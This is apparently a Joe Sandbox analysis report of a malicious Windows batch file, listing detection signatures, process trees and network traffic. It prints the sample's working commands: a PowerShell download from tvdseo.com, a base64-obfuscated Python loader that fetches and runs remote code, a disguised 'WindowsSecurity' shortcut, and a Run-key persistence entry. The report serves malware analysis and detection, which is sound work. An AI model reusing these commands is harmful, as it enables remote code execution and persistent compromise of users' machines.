Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JDHh9P2IVM.bat

Overview

General Information

Sample name:JDHh9P2IVM.bat
renamed because original name is a hash value
Original sample name:e689601d502cc0cd8017f9d6953ce7e201b2dad42f679dc33afa673249ea1aa4.bat
Analysis ID:1562560
MD5:adabb1b5ab34eceebe677ec0c83131cd
SHA1:327775de37951a78263245e4b1c648f134e74775
SHA256:e689601d502cc0cd8017f9d6953ce7e201b2dad42f679dc33afa673249ea1aa4
Tags:batCompilazioneprotetticopyrightuser-JAMESWT_MHT
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Set autostart key via New-ItemProperty Cmdlet
Yara detected Powershell download and execute
AI detected suspicious sample
Accesses ntoskrnl, likely to find offsets for exploits
Creates an autostart registry key pointing to binary in C:\Windows
Powershell creates an autostart link
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Explorer Process Tree Break
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6188 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\JDHh9P2IVM.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 5576 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    • taskkill.exe (PID: 4888 cmdline: taskkill /F /IM synaptics.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2364 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 3796 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2268 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'EAnLaxUKaI'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'EAnLaxUKaI.zip'), $dst) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 4540 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 1136 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\EAnLaxUKaI\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 6508 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 2948 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3544 cmdline: cmd.exe /c start "" "C:\Users\user\AppData\Local\EAnLaxUKaI\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • explorer.exe (PID: 5976 cmdline: "C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 2136 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_3796.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2948, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber: Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 2136, ProcessName: explorer.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\JDHh9P2IVM.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6188, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') ", ProcessId: 2364, ProcessName: cmd.exe
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\JDHh9P2IVM.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6188, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') ", ProcessId: 2364, ProcessName: cmd.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\JDHh9P2IVM.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6188, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3796, ProcessName: powershell.exe

      Persistence and Installation Behavior

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\JDHh9P2IVM.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6188, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force ", ProcessId: 6304, ProcessName: cmd.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://tvdseo.com/file/synaptics.zipAvira URL Cloud: Label: phishing
      Source: JDHh9P2IVM.batReversingLabs: Detection: 23%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability

      Exploits

      barindex
      Source: C:\Windows\explorer.exeFile opened: C:\Windows\System32\ntkrnlmp.exeJump to behavior
      Source: unknownHTTPS traffic detected: 104.21.81.137:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: Binary string: winload_prod.pdb87456555183400_C3B2669B-4862-44CB-BCC1-701EAE43EADE.logg source: explorer.exe, 00000012.00000003.2413376307.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Roamingwinload_prod.pdb87456555183400_C3B2669B-4862-44CB-BCC1-701EAE43EADE.logg source: explorer.exe, 00000012.00000003.2413490533.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: winload_prod.pdbe-8dfa-9938ebc29c814743-B9C8-E1FB294AE265.log0000000000000002.regtrans-ms source: explorer.exe, 00000012.00000003.2413157720.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2413212565.0000000000D50000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ntkrnlmp.pdb-4f1e-8dfa-9938ebc29c814743-B9C8-E1FB294AE265.log0000000000000002.regtrans-ms source: explorer.exe, 00000012.00000003.2413157720.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2413212565.0000000000D50000.00000004.00000020.00020000.00000000.sdmp
      Source: global trafficHTTP traffic detected: GET /file/synaptics.zip HTTP/1.1Host: tvdseo.comConnection: Keep-Alive
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /file/synaptics.zip HTTP/1.1Host: tvdseo.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: tvdseo.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:01:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.2.15expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: max-age=14400, must-revalidatelink: <https://tvdseo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-Encodingplatform: hostingerpanel: hpanelcontent-security-policy: upgrade-insecure-requestsx-turbo-charged-by: LiteSpeedCF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VUqi3T9nF8tfuQNa51Jyj44l8YwFa1wGcBcxGCPQsPw7pKwcNu6M%2B184GvMdYSVfW5J0jlAcyP2Xz3GjDsz6qHuJHaXOtE5531foaPt%2B9s%2Bq6Etwmub4y3mPbvio"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e8333124be40c7c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2125&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=692&delivery_rate=680970&cwnd=129&unsent_bytes=0&cid=4dfb5a33c3be23e9&ts=854&x=0"
      Source: ConDrv.6.drString found in binary or memory: https://tvdseo.com/file/synaptics.zip
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownHTTPS traffic detected: 104.21.81.137:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: classification engineClassification label: mal88.troj.expl.evad.winBAT@26/16@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldzo1zgp.yur.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\JDHh9P2IVM.bat" "
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;synaptics.exe&quot;)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
      Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: JDHh9P2IVM.batReversingLabs: Detection: 23%
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\JDHh9P2IVM.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM synaptics.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'EAnLaxUKaI'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'EAnLaxUKaI.zip'), $dst) "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\EAnLaxUKaI\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\AppData\Local\EAnLaxUKaI\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))"
      Source: unknownProcess created: C:\Windows\explorer.exe "C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk
      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM synaptics.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'EAnLaxUKaI'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'EAnLaxUKaI.zip'), $dst) "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\EAnLaxUKaI\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\AppData\Local\EAnLaxUKaI\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))" Jump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
